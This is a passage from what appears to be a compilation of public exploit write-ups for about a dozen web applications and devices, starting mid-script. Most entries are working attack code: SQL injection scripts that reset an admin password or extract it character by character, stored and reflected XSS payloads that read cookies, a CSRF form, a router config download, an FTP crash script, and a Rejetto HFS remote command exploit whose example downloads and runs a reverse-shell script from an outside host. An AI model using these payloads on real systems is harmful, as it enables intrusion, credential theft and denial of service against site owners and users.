S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] def sig(): SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n" SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n" SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n" SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n" SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n" SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n" SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0] return SIG def header(): head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0] return head def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] if __name__ == "__main__": print(header()) print(sig()) if len(sys.argv) != 2: print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0])) print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0])) sys.exit(-1) SERVER_URL = sys.argv[1] if not re.match(r".*/$", SERVER_URL): SERVER_URL = SERVER_URL+'/' INDEX_URL = SERVER_URL + 'index.php' EXECUTE_URL = SERVER_URL + 'execute.php' LOGIN_URL = SERVER_URL + 'auth/login.php' s = requests.Session() get_session = s.get(INDEX_URL, verify=False) pdata = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'} SQLi = s.post(url=INDEX_URL, data=pdata, verify=False) if SQLi.status_code == 200: print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":") print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0]) else: print(err+'Cannot send payload to webserver.') sys.exit(-1) try: print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0]) EXECUTE = s.get(url=EXECUTE_URL, verify=False) except: print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload') sys.exit(-1) print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0]) print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])

# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated) # Google Dork: "Powered By Best Support System" # Date: 2020-08-23 # Exploit Author: Ex.Mi [ https://ex-mi.ru ] # Vendor: Appsbd [ https://appsbd.com ] # Software Version: 3.0.4 # Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317 # Tested on: Kali Linux # CVE: CVE-2020-24963 # CWE: CWE-79 [i] :: Info: An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4. [$] :: Payloads: 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;> [!] :: PoC (Burp Suite POST request): POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 350 Origin: https://localhost Connection: close Referer: https://localhost/support-system/ticket/details/11.html Cookie: [cookies_here] app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2

# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass # Date: 27/11/2020 # Exploit Author: Kaio Amaral # Vendor Homepage: https://www.intelbras.com/pt-br/ # Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip # Version: firmware version 1.1.2 # Tested on: kali, android # POC # 1. nc host port, ex: nc 10.0.0.1 80 # 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0 # Python3 import socket from time import sleep def exploit(host, port=80): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode() s.connect((host, port)) s.send(pay) sleep(0.2) data = s.recv(17576) if len(data) > 1000: print("[+] Success.") return data.decode() print("[-] Failed. ") exit() def file(data): with open("router.cfg", "w") as file: file.write(data[233:]) print("[+] File Successfully Written.") file(exploit("10.0.0.1"))

# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) # Google Dork: intext:"httpfileserver 2.3" # Date: 28-11-2020 # Remote: Yes # Exploit Author: Óscar Andreu # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 #!/usr/bin/python3 # Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command> # Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')" import urllib3 import sys import urllib.parse try: http = urllib3.PoolManager() url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}' print(url) response = http.request('GET', url) except Exception as ex: print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command") print(ex)

# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure # Date: 2020-11-20 # Exploit Author: Zagros Bingol # Vendor Homepage: http://www.atx.com # Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/ # Version: 2.0 and earlier # Tested on: Debian 10 64bit ------------------------------------- Endpoint: http://www.ip/domain.com/inc/user.ini -------------------------------------- Proof-of-Concept: #!/usr/bin/python3 #License: GNU General Public license v3.0 #Author: Zagros Bingol(Zagrosbingol@outlook.com) import requests import re target = input("Target(ex:http://host): \n") port = input("Port: \n") def sploit(target, port): print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 - Credential Disclosure\n") r = requests.post(target + ":" + port + '/inc/user.ini') searching = re.findall(r"\[.{1,8}\]", str(r.text)) print("Usernames:\n") print(", ".join(searching).replace("[", "").replace("]", "")) def hash(): r = requests.post(target + '/inc/user.ini') searching = re.findall(r"([a-fA-F\d]{32})", str(r.text)) print("Hashes:\n") print(", ".join(searching).replace("[", "").replace("]", "")) hash() sploit(target, port)

# Exploit Title: YATinyWinFTP - Denial of Service (PoC) # Google Dork: None # Date: 20.08.2020 # Exploit Author: strider # Vendor Homepage: https://github.com/ik80/YATinyWinFTP # Software Link: https://github.com/ik80/YATinyWinFTP # Tested on: Windows 10 ------------------------------[Description]--------------------------------- This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end. The result it crashes -----------------------------[Exploit]--------------------------------------------- #!/usr/bin/env python3 # -*- coding:utf-8 -*- import socket, sys target = (sys.argv[1], int(sys.argv[2])) buffer = b'A' * 272 + b'\x20' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target) print(s.recv(1024)) s.send(buffer) s.close() -----------------------------[how to run]----------------------------- C:\> TinyWinFTP.exe servepath port ~$ python3 exploit.py targetip port Boom!

# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail) # Exploit Author: Alperen Ergel # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: Kali & ubuntu # Category: WebApp ######## Description ######## Attacker can change admin e-mail address ## Vulnerable - Go to the admin page view preferences - Change the e-mail address ######## Proof of Concept ######## ===> REQUEST <==== POST /typesetter/Admin/Preferences HTTP/1.1 Host: http://localhost/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 237 Origin: http://localhost/ Connection: close Referer: http://localhost/typesetter/Admin/Preferences ## < SNIPP > verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c &email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save #### Attack Code #### <html> <body> <form action="http://localhost/typesetter/Admin/Preferences" method="POST"> <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" /> <input type="hidden" name="email" value="[CHANGE HERE]" /> <input type="hidden" name="oldpassword" value="" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="password1" value="" /> <input type="hidden" name="algo" value="password&#95;hash" /> <input type="hidden" name="cmd" value="changeprefs" /> <input type="hidden" name="aaa" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-20 # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases. #POC sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10

# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-27 # Exploit Author: ThelastVvV # Vendor Homepage: https://gmapfp.org/ # Version:Version J3.5 /J3.5free # Tested on: Ubuntu # CVE: CVE-2020-23972 # Description: An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions # PoC: Version J3.5 http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload -Once the attacker can locate the unauthenticated file upload form then the attacker can bypass the restriction by changing content-type and name file double extensions file.html.gif then can open file.html # Impact the attacker can upload malicious files can cause defacement of the site or uploading large amount of file til causes denial of service attack to Webapp/Server # Dir File Path: http://127.0.0.1///images/stories/gmapfp/test.html.gif http://127.0.0.1///images/stories/gmapfp/test.html http://127.0.0.1///images/gmapfp/test2.html.gif http://127.0.0.1///images/gmapfp/test2.html.gif # Issues are fixed,Please update to Last Version

# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting # Date: 27.11.2020 # Exploit Author: b3kc4t (Mustafa GUNDOGDU) # Vendor Homepage: https://www.myeventon.com/ # Version: 3.0.5 # Tested on: Ubuntu 18.04 # CVE : 2020-29395 # Description Link: https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS """ ~ VULNERABLITY DETAILS ~ https://target/addons/?q=<svg/onload=alert(/b3kc4t/)> # WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected into the search field. # The following python code will inject javascript code and print out url that will be sent to victim. If you use unicode caracters for xss , exploit will print page source. ##USAGE## $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>' ##OUTPUT## [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)> """ import requests import sys import argparse from colorama import Fore def vuln_reflected(url, payload): s = requests.Session() get_request = s.get(url+payload) if get_request.status_code == 500: print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]") else: content_result = str(get_request.content) search_find = content_result.find(payload) if search_find != -1: print(Fore.GREEN+"[+] "+str(url)+str(payload)) else: print(content_result) def main(): desc = "Wordpress EventON Calendar Plugin XSS" parser = argparse.ArgumentParser(description=desc) exp_option = parser.add_argument_group('') parser.add_argument("--exploit", help ="", action='store_true') parser.add_argument("--url",help="", type=str, required=False) parser.add_argument("--payload",help="",type=str,required=False) args = parser.parse_args() if args.exploit: if args.url: if args.payload: url = args.url payload = args.payload vuln_reflected(url, payload) if name == 'main': main()

# Exploit Title: Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection # Date: 2020-08-23 # Exploit Author: @naivenom # Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html # Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework # Version: 1.0 # Tested on: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 This parameter "email" is vulnerable to Time-Based blind SQL injection in this path "/medical/login.php " that leads to retrieve all databases. #exploit import re import requests from bs4 import BeautifulSoup import sys import urllib3 import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # We can test the time based blind sqli with this script. This script testing with each character of the password column from users name table # and retrieve password from admin user. def time_based_blind_sqli(injection_string): target = "http://localhost:81/medical-store-source/login.php" for j in range(32,126): data = {'email': "%s" % (injection_string.replace("[CHAR]", str(j))), 'password':'xJXb', 'login':''} tim = time.time() r = requests.post(target,data = data, verify=False) nowtime = time.time() curren = nowtime-tim if curren <= 4: return j return None def main(): print("\n(+) Retrieving password from admin user...") # 5 is length of the password. This can # be dynamically stolen from the database as well! for i in range(1,5): injection_string = "admin@admin.com' AND (SELECT 1100 FROM (SELECT(SLEEP(4-(IF(ORD(MID((SELECT IFNULL(CAST(password AS NCHAR),0x20) FROM store.users ORDER BY password LIMIT 0,1),%d,1))>[CHAR],0,1)))))soLu) AND 'yHIV'='yHIV" % i extracted_char = chr(time_based_blind_sqli(injection_string)) sys.stdout.write(extracted_char) sys.stdout.flush() print("\n(+) done!") if __name__ == "__main__": main()

# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.6 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29470 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Subject of mail. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the Marketing-Mail option. 3. Put the below payload in subject field of the Mail : "<script>alert(123)</script>" 5. Now click on send button. 6. The XSS will be triggered. POST /admin/index.php?route=marketing/contact/send&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 HTTP/1.1 Host: localhost Connection: close Content-Length: 206 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: localhost/admin/index.php?route=marketing/contact&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: __cfduid=d6a6bab42bd30fb2b2e20cad3dd5a80ed1606187757; store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products=&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self